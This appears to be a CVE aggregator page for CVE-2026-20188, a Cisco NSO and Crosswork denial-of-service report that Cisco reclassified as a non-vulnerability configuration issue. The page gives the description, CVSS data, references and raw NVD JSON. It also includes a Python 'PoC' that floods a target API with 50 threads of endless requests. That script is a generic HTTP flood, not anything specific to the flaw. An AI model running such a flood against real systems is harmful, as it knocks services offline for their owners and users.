CVE-2026-20188

Description

Following the initial publication of the Security Advisory about a denial of service (DoS) condition in Cisco Crosswork Network Controller and Cisco Network Services Orchestrator (NSO), additional information has been made available to the Cisco Product Security Incident Response Team (PSIRT). Upon further analysis, the Cisco PSIRT has reclassified this issue as a customer-configurable, resource management issue rather than a security vulnerability.

CVSS Details

CVSS Score

0.0

Severity

NONE

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Crosswork Network Controller (具体版本请参考Cisco安全公告)

Cisco Network Services Orchestrator (NSO) (具体版本请参考Cisco安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for Resource Consumption Simulation
# This script demonstrates how high volume requests might impact resource availability.
# Note: CVE-2026-20188 is reclassified as a configuration issue.

import requests
import threading

TARGET_URL = "http://target-cisco-nso:8080/api"
THREAD_COUNT = 50

def send_request():
    try:
        while True:
            r = requests.get(TARGET_URL, timeout=2)
            # print(f"Status: {r.status_code}")
    except Exception as e:
        pass

if __name__ == "__main__":
    print("Starting resource consumption simulation...")
    for i in range(THREAD_COUNT):
        t = threading.Thread(target=send_request)
        t.start()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20188
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20188
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20188/
[4] VulDB https://vuldb.com/cve/CVE-2026-20188
[5] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nso-dos-7Egqyc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20188", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.190", "lastModified": "2026-05-14T17:16:19.573", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Following the initial publication of the Security Advisory about a denial of service (DoS) condition in Cisco Crosswork Network Controller and Cisco Network Services Orchestrator (NSO), additional information has been made available to the Cisco Product Security Incident Response Team (PSIRT).\r\n\r\nUpon further analysis, the Cisco PSIRT has reclassified this issue as a customer-configurable, resource management issue rather than a security vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 0.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nso-dos-7Egqyc", "source": "[email protected]"}]}}